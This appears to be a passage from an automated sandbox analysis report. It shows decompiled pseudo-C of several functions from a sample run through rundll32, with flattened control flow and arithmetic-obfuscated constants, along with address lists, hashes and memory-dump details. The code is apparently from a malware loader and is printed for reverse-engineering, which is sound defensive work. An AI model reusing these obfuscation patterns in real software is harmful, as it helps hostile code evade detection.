				return E001768DE(_v24, _v32, _v20, _v28,  *((intOrPtr*)(_t71 + 0x58)));
			}












                                                                                                                      0x00193678
                                                                                                                      0x0019367f
                                                                                                                      0x00193686
                                                                                                                      0x0019368d
                                                                                                                      0x00193691
                                                                                                                      0x00193698
                                                                                                                      0x001936a3
                                                                                                                      0x001936a6
                                                                                                                      0x001936ad
                                                                                                                      0x001936b4
                                                                                                                      0x001936bb
                                                                                                                      0x001936c2
                                                                                                                      0x001936c9
                                                                                                                      0x001936d0
                                                                                                                      0x001936d7
                                                                                                                      0x001936de
                                                                                                                      0x001936e5
                                                                                                                      0x001936e9
                                                                                                                      0x001936ed
                                                                                                                      0x001936f4
                                                                                                                      0x001936fb
                                                                                                                      0x00193702
                                                                                                                      0x00193706
                                                                                                                      0x0019370d
                                                                                                                      0x00193718
                                                                                                                      0x0019371b
                                                                                                                      0x0019371f
                                                                                                                      0x00193726
                                                                                                                      0x0019372d
                                                                                                                      0x00193734
                                                                                                                      0x0019373b
                                                                                                                      0x0019373f
                                                                                                                      0x00193746
                                                                                                                      0x00193757
                                                                                                                      0x0019375c
                                                                                                                      0x0019377b

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: {Noj$Og$X
                                                                                                                      • API String ID: 0-3024020846
                                                                                                                      • Opcode ID: aefa4bcebb740245b96333660443710362b469cd2a29653bccd9c0d469bcc836
                                                                                                                      • Instruction ID: fa4cab48695d7e46e0f054c8c21d8c0a39f43f58e30efac97727e846c49e3525
                                                                                                                      • Opcode Fuzzy Hash: aefa4bcebb740245b96333660443710362b469cd2a29653bccd9c0d469bcc836
                                                                                                                      • Instruction Fuzzy Hash: 9D31C1B2C0070AEBCF45DFE4C94A8AEFBB0BB10308F208189D51176261D7B44B49CF91
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1003B8BC Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __decode_pointer.LIBCMT ref: 1003B8CA
                                                                                                                        • Part of subcall function 100350AE: TlsGetValue.KERNEL32 ref: 100350BB
                                                                                                                        • Part of subcall function 100350AE: TlsGetValue.KERNEL32 ref: 100350D2
                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32 ref: 1003B8D1
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Value$ExceptionFilterUnhandled__decode_pointer
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1958600898-0
                                                                                                                      • Opcode ID: 5a11b17b52fb02af9bc6982e0ec44a7269600518a9b7aa9640256876448a332b
                                                                                                                      • Instruction ID: 13914855b6ed5f75d6cf868945e622cc1528c9e1cf50f9ea13f0b817109926cd
                                                                                                                      • Opcode Fuzzy Hash: 5a11b17b52fb02af9bc6982e0ec44a7269600518a9b7aa9640256876448a332b
                                                                                                                      • Instruction Fuzzy Hash: 7FC08C388087C04FEB1AD3354D8C30D3E00E713301FC00488DC80D5053EE99410C8323
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0017CA43 Relevance: 2.7, Strings: 2, Instructions: 248COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 95%
                                                                                                                      			E0017CA43(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				void* _t229;
				void* _t247;
				void* _t251;
				void* _t257;
				void* _t260;
				void* _t261;
				void* _t263;
				intOrPtr _t288;
				signed int _t289;
				signed int _t290;
				signed int _t291;
				signed int _t292;
				void* _t294;
				void* _t295;

				_push(_a16);
				_t287 = _a12;
				_t261 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0017CF25(_t229);
				_v64 = 0x836860;
				_t288 = 0;
				_v60 = 0x763ad4;
				_t295 = _t294 + 0x18;
				_v56 = 0;
				_v132 = 0xf23cd2;
				_t263 = 0x1cd9a3d;
				_v132 = _v132 + 0xffff66b2;
				_v132 = _v132 + 0xffff69fc;
				_v132 = _v132 << 8;
				_v132 = _v132 ^ 0xf1039f05;
				_v140 = 0x375552;
				_v140 = _v140 << 6;
				_v140 = _v140 ^ 0xd2a5ef1f;
				_v140 = _v140 >> 0xb;
				_v140 = _v140 ^ 0x00122384;
				_v108 = 0x5e168a;
				_v108 = _v108 >> 0x10;
				_v108 = _v108 + 0xda32;
				_v108 = _v108 ^ 0x00005a0c;
				_v116 = 0x4fe29d;
				_v116 = _v116 >> 0x10;
				_v116 = _v116 << 4;
				_v116 = _v116 ^ 0x0003d351;
				_v88 = 0xa9a316;
				_v88 = _v88 + 0xe91b;
				_v88 = _v88 ^ 0x00a1e0df;
				_v136 = 0x77a290;
				_v136 = _v136 << 0xc;
				_t289 = 0x74;
				_v136 = _v136 / _t289;
				_v136 = _v136 + 0xffff257b;
				_v136 = _v136 ^ 0x01061e79;
				_v152 = 0x936910;
				_v152 = _v152 * 0x7a;
				_v152 = _v152 >> 3;
				_v152 = _v152 + 0xffff8db3;
				_v152 = _v152 ^ 0x08cdb86a;
				_v128 = 0x509c4c;
				_v128 = _v128 + 0x81f1;
				_v128 = _v128 + 0x9dbc;
				_v128 = _v128 >> 5;
				_v128 = _v128 ^ 0x00071675;
				_v148 = 0xcab80c;
				_v148 = _v148 >> 0xd;
				_v148 = _v148 | 0x660debd0;
				_v148 = _v148 + 0xf630;
				_v148 = _v148 ^ 0x660fbc32;
				_v104 = 0xc88284;
				_v104 = _v104 ^ 0xe0b202bb;
				_v104 = _v104 * 0x70;
				_v104 = _v104 ^ 0x35911582;
				_v84 = 0x688efd;
				_v84 = _v84 ^ 0xa5781683;
				_v84 = _v84 ^ 0xa515c2ff;
				_v156 = 0x3b8040;
				_v156 = _v156 | 0xffdbffba;
				_v156 = _v156 ^ 0xfff6b3f0;
				_v72 = 0x8d74e9;
				_v72 = _v72 >> 8;
				_v72 = _v72 ^ 0x0004dfda;
				_v160 = 0xbd1b1c;
				_v160 = _v160 << 0xc;
				_v160 = _v160 | 0x33bb8ca8;
				_v160 = _v160 ^ 0xcf7854ed;
				_v160 = _v160 ^ 0x3ccd45a9;
				_v120 = 0x48e6fb;
				_v120 = _v120 | 0xe61fffb2;
				_v120 = _v120 ^ 0xe6598779;
				_v68 = 0x77306;
				_v68 = _v68 >> 6;
				_v68 = _v68 ^ 0x0008dc17;
				_v112 = 0x774006;
				_v112 = _v112 << 0xd;
				_v112 = _v112 + 0xffffb426;
				_v112 = _v112 ^ 0xe80ab914;
				_v144 = 0x2b5eea;
				_t290 = 0x79;
				_v144 = _v144 * 0x59;
				_v144 = _v144 + 0xffffa818;
				_v144 = _v144 ^ 0xb076c16e;
				_v144 = _v144 ^ 0xbf611da3;
				_v96 = 0xa17410;
				_v96 = _v96 | 0x939b80d1;
				_v96 = _v96 / _t290;
				_v96 = _v96 ^ 0x01375591;
				_v80 = 0xb3b8;
				_t291 = 0x5c;
				_v80 = _v80 / _t291;
				_v80 = _v80 ^ 0x0003830b;
				_v76 = 0xc52b4a;
				_v76 = _v76 >> 0xe;
				_v76 = _v76 ^ 0x00071242;
				_v92 = 0xc8fd49;
				_t292 = 0x54;
				_v92 = _v92 / _t292;
				_v92 = _v92 ^ 0x044db90d;
				_v92 = _v92 ^ 0x044d9acc;
				_v100 = 0x5afe59;
				_v100 = _v100 ^ 0x0de7f0e8;
				_v100 = _v100 | 0x5cb6a54b;
				_v100 = _v100 ^ 0x5db2bb74;
				_v124 = 0xa19aac;
				_v124 = _v124 + 0xffff97b1;
				_v124 = _v124 * 0x3e;
				_v124 = _v124 >> 0xe;
				_v124 = _v124 ^ 0x000bad60;
				while(_t263 != 0xd5ede2) {
					if(_t263 == 0x1cd9a3d) {
						_t263 = 0xd5ede2;
						continue;
					} else {
						if(_t263 == 0x72d0ec7) {
							_t247 = E0017B09F(_v148, _v104,  &_v52, _v84, _t287 + 8, _v156);
							_t295 = _t295 + 0x10;
							__eflags = _t247;
							if(__eflags != 0) {
								_t263 = 0x78e1ae6;
								continue;
							}
						} else {
							if(_t263 == 0x78e1ae6) {
								_t251 = E0017B09F(_v72, _v160,  &_v52, _v120, _t287 + 0xc, _v68);
								_t295 = _t295 + 0x10;
								__eflags = _t251;
								if(__eflags != 0) {
									_t263 = 0xabcd4f8;
									continue;
								}
							} else {
								if(_t263 == 0x7ae58b3) {
									__eflags = E0018B9B1(_v76, _v92, __eflags, _t287 + 0x2c, _v100,  &_v52, _v124);
									_t288 =  !=  ? 1 : _t288;
								} else {
									if(_t263 == 0xabcd4f8) {
										_t257 = E0017B09F(_v112, _v144,  &_v52, _v96, _t287 + 0x40, _v80);
										_t295 = _t295 + 0x10;
										__eflags = _t257;
										if(__eflags != 0) {
											_t263 = 0x7ae58b3;
											continue;
										}
									} else {
										if(_t263 != 0xc0b979a) {
											L18:
											__eflags = _t263 - 0x38140c5;
											if(__eflags != 0) {
												continue;
											} else {
											}
										} else {
											_t260 = E0017B09F(_v88, _v136,  &_v52, _v152, _t287 + 0x38, _v128);
											_t295 = _t295 + 0x10;
											if(_t260 != 0) {
												_t263 = 0x72d0ec7;
												continue;
											}
										}
									}
								}
							}
						}
					}
					return _t288;
				}
				E001864C5(_v132, _v140, _v108, _v116, _t261,  &_v52);
				_t295 = _t295 + 0x10;
				_t263 = 0xc0b979a;
				goto L18;
			}













































                                                                                                                      0x0017ca4d
                                                                                                                      0x0017ca54
                                                                                                                      0x0017ca5b
                                                                                                                      0x0017ca5d
                                                                                                                      0x0017ca5e
                                                                                                                      0x0017ca65
                                                                                                                      0x0017ca6c
                                                                                                                      0x0017ca6d
                                                                                                                      0x0017ca6e
                                                                                                                      0x0017ca73
                                                                                                                      0x0017ca7e
                                                                                                                      0x0017ca80
                                                                                                                      0x0017ca8b
                                                                                                                      0x0017ca8e
                                                                                                                      0x0017ca94
                                                                                                                      0x0017ca9c
                                                                                                                      0x0017caa1
                                                                                                                      0x0017caa9
                                                                                                                      0x0017cab1
                                                                                                                      0x0017cab6
                                                                                                                      0x0017cabe
                                                                                                                      0x0017cac6
                                                                                                                      0x0017cacb
                                                                                                                      0x0017cad3
                                                                                                                      0x0017cad8
                                                                                                                      0x0017cae0
                                                                                                                      0x0017cae8
                                                                                                                      0x0017caed
                                                                                                                      0x0017caf5
                                                                                                                      0x0017cafd
                                                                                                                      0x0017cb05
                                                                                                                      0x0017cb0a
                                                                                                                      0x0017cb0f
                                                                                                                      0x0017cb17
                                                                                                                      0x0017cb1f
                                                                                                                      0x0017cb27
                                                                                                                      0x0017cb2f
                                                                                                                      0x0017cb37
                                                                                                                      0x0017cb42
                                                                                                                      0x0017cb45
                                                                                                                      0x0017cb49
                                                                                                                      0x0017cb51
                                                                                                                      0x0017cb59
                                                                                                                      0x0017cb66
                                                                                                                      0x0017cb6a
                                                                                                                      0x0017cb6f
                                                                                                                      0x0017cb77
                                                                                                                      0x0017cb7f
                                                                                                                      0x0017cb87
                                                                                                                      0x0017cb8f
                                                                                                                      0x0017cb97
                                                                                                                      0x0017cb9c
                                                                                                                      0x0017cba4
                                                                                                                      0x0017cbac
                                                                                                                      0x0017cbb1
                                                                                                                      0x0017cbb9
                                                                                                                      0x0017cbc1
                                                                                                                      0x0017cbc9
                                                                                                                      0x0017cbd1
                                                                                                                      0x0017cbde
                                                                                                                      0x0017cbe2
                                                                                                                      0x0017cbea
                                                                                                                      0x0017cbf2
                                                                                                                      0x0017cbfa
                                                                                                                      0x0017cc02
                                                                                                                      0x0017cc0a
                                                                                                                      0x0017cc12
                                                                                                                      0x0017cc1a
                                                                                                                      0x0017cc22
                                                                                                                      0x0017cc27
                                                                                                                      0x0017cc2f
                                                                                                                      0x0017cc37
                                                                                                                      0x0017cc3e
                                                                                                                      0x0017cc46
                                                                                                                      0x0017cc4e
                                                                                                                      0x0017cc56
                                                                                                                      0x0017cc5e
                                                                                                                      0x0017cc66
                                                                                                                      0x0017cc6e
                                                                                                                      0x0017cc76
                                                                                                                      0x0017cc7b
                                                                                                                      0x0017cc83
                                                                                                                      0x0017cc8b
                                                                                                                      0x0017cc90
                                                                                                                      0x0017cc98
                                                                                                                      0x0017cca0
                                                                                                                      0x0017ccaf
                                                                                                                      0x0017ccb2
                                                                                                                      0x0017ccb6
                                                                                                                      0x0017ccbe
                                                                                                                      0x0017ccc6
                                                                                                                      0x0017ccce
                                                                                                                      0x0017ccd6
                                                                                                                      0x0017cce6
                                                                                                                      0x0017ccea
                                                                                                                      0x0017ccf2
                                                                                                                      0x0017ccfe
                                                                                                                      0x0017cd03
                                                                                                                      0x0017cd09
                                                                                                                      0x0017cd11
                                                                                                                      0x0017cd19
                                                                                                                      0x0017cd1e
                                                                                                                      0x0017cd26
                                                                                                                      0x0017cd32
                                                                                                                      0x0017cd3a
                                                                                                                      0x0017cd3e
                                                                                                                      0x0017cd46
                                                                                                                      0x0017cd4e
                                                                                                                      0x0017cd56
                                                                                                                      0x0017cd5e
                                                                                                                      0x0017cd66
                                                                                                                      0x0017cd6e
                                                                                                                      0x0017cd76
                                                                                                                      0x0017cd83
                                                                                                                      0x0017cd87
                                                                                                                      0x0017cd8c
                                                                                                                      0x0017cd94
                                                                                                                      0x0017cda2
                                                                                                                      0x0017ceb1
                                                                                                                      0x00000000
                                                                                                                      0x0017cda8
                                                                                                                      0x0017cdae
                                                                                                                      0x0017ce9b
                                                                                                                      0x0017cea0
                                                                                                                      0x0017cea3
                                                                                                                      0x0017cea5
                                                                                                                      0x0017cea7
                                                                                                                      0x00000000
                                                                                                                      0x0017cea7
                                                                                                                      0x0017cdb4
                                                                                                                      0x0017cdba
                                                                                                                      0x0017ce65
                                                                                                                      0x0017ce6a
                                                                                                                      0x0017ce6d
                                                                                                                      0x0017ce6f
                                                                                                                      0x0017ce75
                                                                                                                      0x00000000
                                                                                                                      0x0017ce75
                                                                                                                      0x0017cdc0
                                                                                                                      0x0017cdc6
                                                                                                                      0x0017cf13
                                                                                                                      0x0017cf15
                                                                                                                      0x0017cdcc
                                                                                                                      0x0017cdd2
                                                                                                                      0x0017ce2f
                                                                                                                      0x0017ce34
                                                                                                                      0x0017ce37
                                                                                                                      0x0017ce39
                                                                                                                      0x0017ce3f
                                                                                                                      0x00000000
                                                                                                                      0x0017ce3f
                                                                                                                      0x0017cdd4
                                                                                                                      0x0017cdda
                                                                                                                      0x0017cede
                                                                                                                      0x0017cede
                                                                                                                      0x0017cee4
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0017ceea
                                                                                                                      0x0017cde0
                                                                                                                      0x0017cdfc
                                                                                                                      0x0017ce01
                                                                                                                      0x0017ce06
                                                                                                                      0x0017ce0c
                                                                                                                      0x00000000
                                                                                                                      0x0017ce0c
                                                                                                                      0x0017ce06
                                                                                                                      0x0017cdda
                                                                                                                      0x0017cdd2
                                                                                                                      0x0017cdc6
                                                                                                                      0x0017cdba
                                                                                                                      0x0017cdae
                                                                                                                      0x0017cf24
                                                                                                                      0x0017cf24
                                                                                                                      0x0017ced1
                                                                                                                      0x0017ced6
                                                                                                                      0x0017ced9
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: RU7$^+
                                                                                                                      • API String ID: 0-4228232731
                                                                                                                      • Opcode ID: 7af6df2ff8a9b6f82361f13cbade41a7c387482da999aa364547f9e347cbb905
                                                                                                                      • Instruction ID: 50360c7b0ad7406a4b92d552592e47476c153b9f3afc374416828a5b19d163f8
                                                                                                                      • Opcode Fuzzy Hash: 7af6df2ff8a9b6f82361f13cbade41a7c387482da999aa364547f9e347cbb905
                                                                                                                      • Instruction Fuzzy Hash: CBC110711083859FD768CE61C88991BFBF5FBC4388F10891DF69A86260D7B58949CF83
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0018BE8C Relevance: 2.7, Strings: 2, Instructions: 225COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 95%
                                                                                                                      			E0018BE8C() {
				char _v524;
				intOrPtr _v548;
				char _v564;
				void* _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				char _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				signed int _v640;
				signed int _v644;
				signed int _v648;
				signed int _v652;
				signed int _v656;
				signed int _v660;
				signed int _v664;
				signed int _v668;
				signed int _v672;
				signed int _t217;
				signed int _t223;
				void* _t224;
				void* _t226;
				signed int _t227;
				signed int _t229;
				signed int _t230;
				signed int _t231;
				signed int _t232;
				signed int _t233;
				signed int _t248;
				void* _t251;
				void* _t256;
				void* _t258;

				_v580 = 0x2596f5;
				asm("stosd");
				_t227 = 0;
				_t229 = 0x1e;
				asm("stosd");
				_t251 = 0x1d7b34c;
				asm("stosd");
				_v624 = 0x892a55;
				_v624 = _v624 | 0xee7fd748;
				_v624 = _v624 ^ 0xeeffffdd;
				_v620 = 0x622f6;
				_v620 = _v620 + 0xbb0c;
				_v620 = _v620 + 0xffff07a8;
				_v620 = _v620 ^ 0x0005e5ab;
				_v632 = 0xb1aa42;
				_v632 = _v632 + 0xffffd879;
				_v632 = _v632 << 7;
				_v632 = _v632 ^ 0x58c15d83;
				_v668 = 0xaf491c;
				_v668 = _v668 | 0xa282f1df;
				_v668 = _v668 * 0x52;
				_v668 = _v668 ^ 0xbc704b9b;
				_v668 = _v668 ^ 0xa02fbf7e;
				_v604 = 0x754ed8;
				_v604 = _v604 / _t229;
				_v604 = _v604 ^ 0x00089259;
				_v636 = 0x96d5f2;
				_v636 = _v636 + 0xd4a1;
				_t230 = 0x30;
				_v636 = _v636 * 0x11;
				_v636 = _v636 ^ 0x0a12807c;
				_v660 = 0x62eec7;
				_v660 = _v660 >> 3;
				_v660 = _v660 / _t230;
				_v660 = _v660 ^ 0xcf464c50;
				_v660 = _v660 ^ 0xcf48190c;
				_v596 = 0xd58755;
				_v596 = _v596 + 0xffffee65;
				_v596 = _v596 ^ 0x00d4794f;
				_v652 = 0xd65add;
				_v652 = _v652 + 0x69d5;
				_v652 = _v652 + 0xffff6cdd;
				_t231 = 0x44;
				_v652 = _v652 * 0x6f;
				_v652 = _v652 ^ 0x5cddf580;
				_v592 = 0x774283;
				_v592 = _v592 / _t231;
				_v592 = _v592 ^ 0x00057017;
				_v608 = 0x66f034;
				_v608 = _v608 * 0x1b;
				_v608 = _v608 ^ 0x0ad54449;
				_v628 = 0x797189;
				_v628 = _v628 | 0xd7c49ce2;
				_v628 = _v628 + 0x4eb;
				_v628 = _v628 ^ 0xd7fc7544;
				_v644 = 0xc6323c;
				_t232 = 0x1a;
				_v644 = _v644 / _t232;
				_v644 = _v644 | 0xc7b29cf4;
				_v644 = _v644 ^ 0xc7b916af;
				_v640 = 0x832b72;
				_v640 = _v640 << 1;
				_v640 = _v640 ^ 0x03109e90;
				_v640 = _v640 ^ 0x021bea31;
				_v600 = 0x7e41eb;
				_v600 = _v600 ^ 0xc4682a67;
				_v600 = _v600 ^ 0xc419d008;
				_v648 = 0x2ae2e2;
				_v648 = _v648 ^ 0xaa2d9f28;
				_v648 = _v648 ^ 0xe0508244;
				_v648 = _v648 + 0xffff0ac8;
				_v648 = _v648 ^ 0x4a517815;
				_v656 = 0x46e590;
				_v656 = _v656 + 0xffffd71a;
				_v656 = _v656 << 0xb;
				_v656 = _v656 | 0x65ccd40d;
				_v656 = _v656 ^ 0x75e69a05;
				_v616 = 0x212081;
				_v616 = _v616 + 0xffff369d;
				_v616 = _v616 << 3;
				_v616 = _v616 ^ 0x010dc67b;
				_v612 = 0xde1992;
				_v612 = _v612 | 0x34451690;
				_v612 = _v612 ^ 0x34df36a3;
				_v664 = 0xb873dc;
				_t233 = 9;
				_t250 = _v612;
				_v664 = _v664 / _t233;
				_v664 = _v664 * 0x16;
				_v664 = _v664 << 6;
				_v664 = _v664 ^ 0x70bc85f2;
				_v672 = 0x9e756b;
				_v672 = _v672 + 0xfffff8a5;
				_v672 = _v672 << 4;
				_v672 = _v672 * 0x17;
				_v672 = _v672 ^ 0xe3b54af9;
				do {
					while(_t251 != 0x1d7b34c) {
						if(_t251 == 0x2564c7d) {
							_t217 = E0018BC49(_t250, _v628, _v644, _v640,  &_v564, _v600);
							_t234 = _v648;
							asm("sbb esi, esi");
							_t251 = ( ~_t217 & 0xf96b950b) + 0xe5304db;
							E00184DAD(_v648, _v656, _t250, _v616, _v612);
							_t258 = _t258 + 0x24;
							goto L14;
						} else {
							if(_t251 == 0x7be99e6) {
								_t248 = _v672;
								E0018BBB2(_v664, _t248,  &_v588);
								_pop(_t234);
								_t251 = 0xba7f047;
								continue;
							} else {
								if(_t251 == 0xb29cf6f) {
									_t234 = 0;
									_t248 = _v624;
									_t223 = E0018E938(0, _t248, _v660, _v596, _v632, 0, _v652, _v592, 0, _v608, _v620,  &_v524);
									_t250 = _t223;
									_t258 = _t258 + 0x28;
									__eflags = _t223 - 0xffffffff;
									if(__eflags != 0) {
										_t251 = 0x2564c7d;
										continue;
									}
								} else {
									if(_t251 == 0xba7f047) {
										_t224 = E00179A1E();
										_t256 = _v588 - _v548;
										asm("sbb ecx, [esp+0x94]");
										__eflags = _v584 - _t248;
										if(__eflags >= 0) {
											if(__eflags > 0) {
												L19:
												_t227 = 1;
												__eflags = 1;
											} else {
												__eflags = _t256 - _t224;
												if(_t256 >= _t224) {
													goto L19;
												}
											}
										}
									} else {
										_t265 = _t251 - 0xcb5264b;
										if(_t251 != 0xcb5264b) {
											goto L14;
										} else {
											_t248 = _v668;
											_t226 = E001912A8(_t234, _t248, _t265, _v604, _v636,  &_v524);
											_t258 = _t258 + 0xc;
											if(_t226 != 0) {
												_t251 = 0xb29cf6f;
												continue;
											}
										}
									}
								}
							}
						}
						L20:
						return _t227;
					}
					_t251 = 0xcb5264b;
					L14:
					__eflags = _t251 - 0xe5304db;
				} while (__eflags != 0);
				goto L20;
			}













































                                                                                                                      0x0018be92
                                                                                                                      0x0018bea6
                                                                                                                      0x0018bea7
                                                                                                                      0x0018beab
                                                                                                                      0x0018beae
                                                                                                                      0x0018beaf
                                                                                                                      0x0018beb4
                                                                                                                      0x0018beb5
                                                                                                                      0x0018bebd
                                                                                                                      0x0018bec5
                                                                                                                      0x0018becd
                                                                                                                      0x0018bed5
                                                                                                                      0x0018bedd
                                                                                                                      0x0018bee5
                                                                                                                      0x0018beed
                                                                                                                      0x0018bef5
                                                                                                                      0x0018befd
                                                                                                                      0x0018bf02
                                                                                                                      0x0018bf0a
                                                                                                                      0x0018bf12
                                                                                                                      0x0018bf1f
                                                                                                                      0x0018bf23
                                                                                                                      0x0018bf2b
                                                                                                                      0x0018bf33
                                                                                                                      0x0018bf43
                                                                                                                      0x0018bf47
                                                                                                                      0x0018bf4f
                                                                                                                      0x0018bf57
                                                                                                                      0x0018bf64
                                                                                                                      0x0018bf67
                                                                                                                      0x0018bf6b
                                                                                                                      0x0018bf73
                                                                                                                      0x0018bf7b
                                                                                                                      0x0018bf88
                                                                                                                      0x0018bf8c
                                                                                                                      0x0018bf94
                                                                                                                      0x0018bf9c
                                                                                                                      0x0018bfa4
                                                                                                                      0x0018bfac
                                                                                                                      0x0018bfb4
                                                                                                                      0x0018bfbc
                                                                                                                      0x0018bfc4
                                                                                                                      0x0018bfd1
                                                                                                                      0x0018bfd4
                                                                                                                      0x0018bfd8
                                                                                                                      0x0018bfe0
                                                                                                                      0x0018bfee
                                                                                                                      0x0018bff2
                                                                                                                      0x0018bffa
                                                                                                                      0x0018c007
                                                                                                                      0x0018c00b
                                                                                                                      0x0018c013
                                                                                                                      0x0018c01b
                                                                                                                      0x0018c023
                                                                                                                      0x0018c02b
                                                                                                                      0x0018c035
                                                                                                                      0x0018c041
                                                                                                                      0x0018c046
                                                                                                                      0x0018c04c
                                                                                                                      0x0018c059
                                                                                                                      0x0018c061
                                                                                                                      0x0018c069
                                                                                                                      0x0018c06d
                                                                                                                      0x0018c075
                                                                                                                      0x0018c07d
                                                                                                                      0x0018c085
                                                                                                                      0x0018c08d
                                                                                                                      0x0018c095
                                                                                                                      0x0018c09d
                                                                                                                      0x0018c0a5
                                                                                                                      0x0018c0ad
                                                                                                                      0x0018c0b5
                                                                                                                      0x0018c0bd
                                                                                                                      0x0018c0c5
                                                                                                                      0x0018c0cd
                                                                                                                      0x0018c0d2
                                                                                                                      0x0018c0da
                                                                                                                      0x0018c0e2
                                                                                                                      0x0018c0ea
                                                                                                                      0x0018c0f2
                                                                                                                      0x0018c0f7
                                                                                                                      0x0018c0ff
                                                                                                                      0x0018c107
                                                                                                                      0x0018c10f
                                                                                                                      0x0018c117
                                                                                                                      0x0018c123
                                                                                                                      0x0018c126
                                                                                                                      0x0018c12a
                                                                                                                      0x0018c133
                                                                                                                      0x0018c137
                                                                                                                      0x0018c13c
                                                                                                                      0x0018c144
                                                                                                                      0x0018c14c
                                                                                                                      0x0018c154
                                                                                                                      0x0018c15e
                                                                                                                      0x0018c162
                                                                                                                      0x0018c16a
                                                                                                                      0x0018c16a
                                                                                                                      0x0018c178
                                                                                                                      0x0018c254
                                                                                                                      0x0018c269
                                                                                                                      0x0018c26d
                                                                                                                      0x0018c276
                                                                                                                      0x0018c27c
                                                                                                                      0x0018c281
                                                                                                                      0x00000000
                                                                                                                      0x0018c17e
                                                                                                                      0x0018c184
                                                                                                                      0x0018c21e
                                                                                                                      0x0018c22b
                                                                                                                      0x0018c230
                                                                                                                      0x0018c231
                                                                                                                      0x00000000
                                                                                                                      0x0018c18a
                                                                                                                      0x0018c190
                                                                                                                      0x0018c1f3
                                                                                                                      0x0018c200
                                                                                                                      0x0018c204
                                                                                                                      0x0018c209
                                                                                                                      0x0018c20b
                                                                                                                      0x0018c20e
                                                                                                                      0x0018c211
                                                                                                                      0x0018c217
                                                                                                                      0x00000000
                                                                                                                      0x0018c217
                                                                                                                      0x0018c192
                                                                                                                      0x0018c198
                                                                                                                      0x0018c299
                                                                                                                      0x0018c2a2
                                                                                                                      0x0018c2ad
                                                                                                                      0x0018c2b4
                                                                                                                      0x0018c2b6
                                                                                                                      0x0018c2b8
                                                                                                                      0x0018c2be
                                                                                                                      0x0018c2c0
                                                                                                                      0x0018c2c0
                                                                                                                      0x0018c2ba
                                                                                                                      0x0018c2ba
                                                                                                                      0x0018c2bc
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0018c2bc
                                                                                                                      0x0018c2b8
                                                                                                                      0x0018c19e
                                                                                                                      0x0018c19e
                                                                                                                      0x0018c1a4
                                                                                                                      0x00000000
                                                                                                                      0x0018c1aa
                                                                                                                      0x0018c1ba
                                                                                                                      0x0018c1be
                                                                                                                      0x0018c1c3
                                                                                                                      0x0018c1c8
                                                                                                                      0x0018c1ce
                                                                                                                      0x00000000
                                                                                                                      0x0018c1ce
                                                                                                                      0x0018c1c8
                                                                                                                      0x0018c1a4
                                                                                                                      0x0018c198
                                                                                                                      0x0018c190
